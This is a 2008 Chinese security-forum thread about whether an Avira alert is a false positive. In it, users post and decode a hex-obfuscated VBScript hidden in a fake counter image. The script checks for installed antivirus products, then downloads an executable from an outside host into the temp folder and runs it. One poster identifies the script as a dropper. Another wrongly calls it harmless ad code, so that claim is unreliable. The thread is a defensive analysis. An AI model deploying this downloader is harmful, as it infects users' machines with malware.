收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 国外杀毒软件 Avira(小红伞) 红伞又误报?
123下一页
返回列表 发新帖
楼主: dd2006
 收起左侧

[其他相关] 红伞又误报?

[复制链接]
y37007
发表于 2008-1-2 20:07:42 | 显示全部楼层
document.write    就是直接在页面上打印出括号里面的东西,但是是width=0 height=0,长和宽都为0,所以在页面上看不到,
<ifr'+'ame     其实就是   <iframe   估计小红伞就是因为这个报的,这段的确写的比较诡异
回复

举报

闪电战
发表于 2008-1-2 20:18:34 | 显示全部楼层
http://a1.65862.com/count.html
会打开一个gif图片count.gif
名字上看是计数器一类的,但里面是一段代码

Y1="4F6E206572726F7220726573756D65204E6578740D0A58313D22687474703A2F2F61642E36353836322E636F6D2F7265616C2E676966220D0A5365742058323D646F63756D656E742E637265617465456C656D656E7428226F626A22262265637422290D0A58322E7365744174747269627574652022636C6173736964222C22636C7369643A42222622443922262236433535362D363541332D313144302D393833412D303043303446433239453336220D0A536574205831373D58322E6372656174656F626A6563742822575363726970742E5368656C6C222C2222290D0A5831383D5831372E526567526561642822484B4C4D5C534F4654574152455C6164785C436F6E6669675C54696D653122290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C7265616C5C436F6E6669675C54696D653122290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C726973696E675C5261765C22290D0A5831383D583138265831372E526567526561642822484B43555C534F4654574152455C526973696E675C4B614B61546F6F6C4261725C6E616D6522290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C333630736166655C436F6F705C507265506172746E657222290D0A5831383D583138265831372E526567526561642822484B43555C534F4654574152455C4B696E67736F66745C416E746956697275735C496E7374616C6C54696D6522290D0A5831383D583138265831372E526567526561642822484B4C4D5C534F4654574152455C4B6173706572736B794C61625C415650365C656E7669726F6E6D656E745C50726F647563744E616D6522290D0A4966205831383D2222205468656E0D0A58333D224D2226226963722226226F736F66742E582226224D4C48222622545450220D0A5365742058343D58322E4372656174654F626A6563742858332C2222290D0A58353D2241646F220D0A58363D2264622E220D0A58373D22537472220D0A58383D2265616D220D0A58393D58352658362658372658380D0A5831303D58390D0A736574205831313D58322E6372656174656F626A656374285831302C2222290D0A5831312E747970653D310D0A5831323D22474554220D0A58342E4F70656E205831322C58312C46616C73650D0A58342E53656E640D0A5831333D225822264353747228496E742828393939392D313030302B31292A526E642B31303030292926222E636F6D220D0A736574205831343D58322E6372656174656F626A6563742822532226226372692226227074696E672E46222622696C6553792226227374656D4F626A656374222C2222290D0A736574205831353D5831342E4765745370656369616C466F6C6465722832290D0A5831333D5831342E4275696C6450617468285831352C583133290D0A5831312E6F70656E0D0A5831312E77726974652058342E726573706F6E7365426F64790D0A5831312E73617665746F66696C65205831332C320D0A5831312E636C6F73650D0A53657420583136203D2058322E6372656174656F626A6563742822575363726970742E5368656C6C222C2222290D0A5831362E72756E28583133290D0A456E64204966":Y2="EXECUTE """"":Y3="&CHR(&H":Y4=")":DO WHILE LEN(Y1)>1:Y2=Y2&Y3&LEFT(Y1,2)&Y4:Y1=MID(Y1,3)
LOOP:EXECUTE Y2

没见过计数器的图片这样,这正常吗?

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

jimmyleo
发表于 2008-1-2 22:22:06 | 显示全部楼层
闪电没有必要和这种人计较
比海更宽广的是胸怀
送大家一句话共勉:静由心生。
且看淡他,当作空气即可。

yimike,闪电都分析的不错,
接下来在下来吧~
回复

举报

jimmyleo
发表于 2008-1-2 22:33:36 | 显示全部楼层
第一层 为 无分隔符的ascii简单转换

  2. On error resume Next
  3. X1="http://ad.65862.com/real.gif"
  4. Set X2=document.createElement("obj"&"ect")
  5. X2.setAttribute "classid","clsid:B"&"D9"&"6C556-65A3-11D0-983A-00C04FC29E36"
  6. Set X17=X2.createobject("WScript.Shell","")
  7. X18=X17.RegRead("HKLM\SOFTWARE\adx\Config\Time1")
  8. X18=X18&X17.RegRead("HKLM\SOFTWARE\real\Config\Time1")
  9. X18=X18&X17.RegRead("HKLM\SOFTWARE\rising\Rav")
  10. X18=X18&X17.RegRead("HKCU\SOFTWARE\Rising\KaKaToolBar\name")
  11. X18=X18&X17.RegRead("HKLM\SOFTWARE\360safe\Coop\PrePartner")
  12. X18=X18&X17.RegRead("HKCU\SOFTWARE\Kingsoft\AntiVirus\InstallTime")
  13. X18=X18&X17.RegRead("HKLM\SOFTWARE\KasperskyLab\AVP6\environment\ProductName")
  14. If X18="" Then
  15. X3="M"&"icr"&"osoft.X"&"MLH"&"TTP"
  16. Set X4=X2.CreateObject(X3,"")
  17. X5="Ado"
  18. X6="db."
  19. X7="Str"
  20. X8="eam"
  21. X9=X5&X6&X7&X8
  22. X10=X9
  23. set X11=X2.createobject(X10,"")
  24. X11.type=1
  25. X12="GET"
  26. X4.Open X12,X1,False
  27. X4.Send
  28. X13="X"&CStr(Int((9999-1000+1)*Rnd+1000))&".com"
  29. set X14=X2.createobject("S"&"cri"&"pting.F"&"ileSy"&"stemObject","")
  30. set X15=X14.GetSpecialFolder(2)
  31. X13=X14.BuildPath(X15,X13)
  32. X11.open
  33. X11.write X4.responseBody
  34. X11.savetofile X13,2
  35. X11.close
  36. Set X16 = X2.createobject("WScript.Shell","")
  37. X16.run(X13)
  38. End If
复制代码


之前的count脚本做的是修改时间 使卡巴6无效
之后判断是否安装realplayer、瑞星、金山、卡巴、360等
如果是则创建个随机文件夹等待下载
通过adobe流下载 并用wscript组件打开文件夹执行之

下载的是http://ad.65862.com/real.gif


ADSPY/Drop.Boran.I


that's all~

[ 本帖最后由 jimmyleo 于 2008-1-2 22:43 编辑 ]
回复

举报

xlya
发表于 2008-1-2 22:37:05 | 显示全部楼层
红伞的启发性高.误报自然就高.你选得了红伞.就应该料想到这点,
  鱼和熊掌不可得兼阿
回复

举报

kevinlee
发表于 2008-1-2 22:47:12 | 显示全部楼层
这个我记得我上传过的啊,当时是2个文件的
回复

举报

ngh55
发表于 2008-1-2 22:54:30 | 显示全部楼层
卡巴、毒霸、瑞星、360成了代码修改攻击目标,用伞的人还是不多。今天到电脑维修处更换主板电容,维修处的人看到NOD32、伞都不知是什么东西。
回复

举报

feijun
发表于 2008-1-2 23:00:24 | 显示全部楼层
确实是误报,是网站首页广告的脚本代码。没有事的
回复

举报

no3q
发表于 2008-1-2 23:00:41 | 显示全部楼层
原帖由 ngh55 于 2008-1-2 22:54 发表
卡巴、毒霸、瑞星、360成了代码修改攻击目标,用伞的人还是不多。今天到电脑维修处更换主板电容,维修处的人看到NOD32、伞都不知是什么东西。

不知者不罪哇[:1:]
回复

举报

闪电战
发表于 2008-1-2 23:09:16 | 显示全部楼层

回复 14楼 jimmyleo 的帖子

看来红伞没误报?

那个图片后面的代码大致看得懂它想干什么,但最关键的开头那一串乱码看不懂~赫赫
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-2 00:59 , Processed in 0.104219 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表